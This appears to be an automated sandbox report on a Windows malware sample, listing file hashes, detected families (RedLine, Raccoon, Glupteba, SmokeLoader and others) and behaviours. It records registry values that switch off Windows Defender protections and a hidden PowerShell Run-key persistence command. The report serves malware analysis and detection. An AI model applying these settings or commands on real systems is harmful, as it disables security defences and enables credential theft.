C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 14e29a27ad25be30475aedb90ef2e47b
SHA1 a912e53849141f639c1becc92f5f7755044c0f76
SHA256 282d2200418504b8ef028ea363be6de9d58fbb4fd63b52032c7b92892fa20235
SHA512 ddea9d8576bbdd44b33b9db6d466eb0c474ece49f5fb3cdb5e61fd93437848271f0dde4ff56f3eb977d25c1927728127d8508049e5091d305371cc21eebc337e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e50694b0b109f55ac5825ca513ea2bc2
SHA1 0fdcf5a8e67c063616b41e91d0b6dc00b3783c9e
SHA256 a5d4deebfff7d571a9f5af0fcbbe11b5c1dfca8cadc4454fe1ca531521781d0e
SHA512 b39644bc90ca6ba4766e4b01d631bb16162d7bbdce201cef096e80069be33b819aa82da504667f05840063cf8a1525da7cf77f5aeb0cc67c0455e091d53c360a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b89304da5ac7d29439c920c9b2abdb9a
SHA1 bf8d5e982d27194210a21308cd0604f461185556
SHA256 4ac7d88c0085e3e8a7a50f5c727a3d8a9a59d70cba02317fe48676208d113af4
SHA512 7dfaa13776293d841a886e02484629758d1cddfdc27a1c7bd7ff4c9aab7b361ea9cb1be3d5c93d37d338d0fb8be74b6fe994aa1a588df9ae0b7ac0df069803b9

memory/2620-1610-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1180-1611-0x000000013FF40000-0x00000001404E1000-memory.dmp

memory/2132-1651-0x00000000025C0000-0x00000000029B8000-memory.dmp

memory/1180-1732-0x000000013FF40000-0x00000001404E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 6ba5efaed679d0e957cebcf5dbcae833
SHA1 498fad284e6ae18be449e8f99d837b2e6c3f7fc5
SHA256 4092b2efa5152d16864db1baf26b19796f8d80acd2b576836ef896c0f8ca9e9b
SHA512 dec7605c0fc14bd09f7a6ec3a6ac28b3c810862e08d1c0e0d69aaedb21e439ba58ddc0d093373f0e020e61e5a815b77eca9251a03e08fc1f044745597a6eba15

memory/2132-1737-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2132-1743-0x0000000000400000-0x0000000000D1B000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-31 05:32

Reported

2023-10-31 05:34

Platform

win10v2004-20231020-en

Max time kernel

64s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1BD4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1BD4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1BD4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1BD4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1BD4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1BD4.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1CDF.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4132.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6D08.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\16FE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1837.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1B08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1BD4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1CDF.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yh035IN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4132.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\446F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\ProgramData\DefendSecurity\SecurityHealthService.Scan N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6D08.exe N/A
N/A N/A C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\721A.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\1000068000\Kuteiisd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe N/A
N/A N/A C:\ProgramData\DefendSecurity\SecurityHealthService.Scan N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1BD4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1BD4.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\6D08.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\6D08.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\6D08.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\6D08.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\6D08.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\16FE.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\446F.exe'\"" C:\Users\Admin\AppData\Local\Temp\446F.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detected potential entity reuse from brand microsoft.

phishing microsoft

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\LAudioConverter\is-VA9US.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-9DQQD.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-B9G8C.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-AC0UC.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\XML\Styles\is-G631Q.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\XML\Styles\is-KI19G.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-KCKQ6.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-AAHSB.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-AVSMK.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-9046A.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-618HU.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-OLFNO.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\XML\Styles\is-6F9AU.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-4T8DB.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-OU6BO.tmp C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\LAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1BD4.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V3HS8.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3356 wrote to memory of 2692 N/A N/A C:\Users\Admin\AppData\Local\Temp\16FE.exe
PID 3356 wrote to memory of 2692 N/A N/A C:\Users\Admin\AppData\Local\Temp\16FE.exe
